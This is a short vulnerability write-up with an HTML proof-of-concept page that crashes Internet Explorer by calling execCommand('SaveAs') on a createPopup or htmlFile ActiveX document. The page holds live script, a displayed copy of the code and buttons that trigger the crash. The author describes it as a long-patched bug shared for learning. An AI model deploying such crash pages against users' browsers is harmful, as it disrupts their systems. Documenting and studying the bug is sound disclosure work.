Calling document.execCommand("SaveAs") on the document of a createPopup or htmlFile ActiveX crashes IE. Both off-screen document containers lack the necessary hosting context for the Save As dialog, leading to a null pointer dereference when the command tries to access the parent window.

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>DOS_documentExecCommandSaveAs</TITLE></HEAD>
<BODY>
<SCRIPT LANGUAGE="JavaScript">
function crashThrough_createPopup()
{
	var myCrashPop=createPopup();
	myCrashPop.document.execCommand("SaveAs");
}
function crashThrough_AXhtmlFile()
{
	var myCrashAX=new ActiveXObject("htmlFile");
	myCrashAX.execCommand("SaveAs");
}
</SCRIPT>

<FONT SIZE="2" FACE="Tahoma">
Two ways to crash the Browser using document.execCommand("SaveAs") inside a createPopup or an htmlFile<BR><BR>
<HR>
function <B>crashThrough_createPopup()</B><BR>
{<BR>
&nbsp;&nbsp;&nbsp;&nbsp;var myCrashPop=<FONT COLOR="BLUE"><B>createPopup()</B></FONT>;<BR>
&nbsp;&nbsp;&nbsp;&nbsp;myCrashPop.document.execCommand("SaveAs");<BR>
}<BR>
<HR>
function <B>crashThrough_AXhtmlFile()</B><BR>
{<BR>
&nbsp;&nbsp;&nbsp;&nbsp;var myCrashAX=new <FONT COLOR="BLUE"><B>ActiveXObject("htmlFile")</B></FONT>;<BR>
&nbsp;&nbsp;&nbsp;&nbsp;myCrashAX.execCommand("SaveAs");<BR>
}<BR>
<HR>
<BR>
<CENTER>
<INPUT TYPE="BUTTON" VALUE="crashThrough_createPopup()" ONCLICK="crashThrough_createPopup()">
<INPUT TYPE="BUTTON" VALUE="crashThrough_AXhtmlFile()" ONCLICK="crashThrough_AXhtmlFile()">
</CENTER>
</FONT>
</BODY>
</HTML>

The execCommand("SaveAs") handler needs to walk up to the top-level browser window to display the file save dialog. When the document belongs to a createPopup or htmlFile object, that walk reaches a null or invalid parent pointer and crashes.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.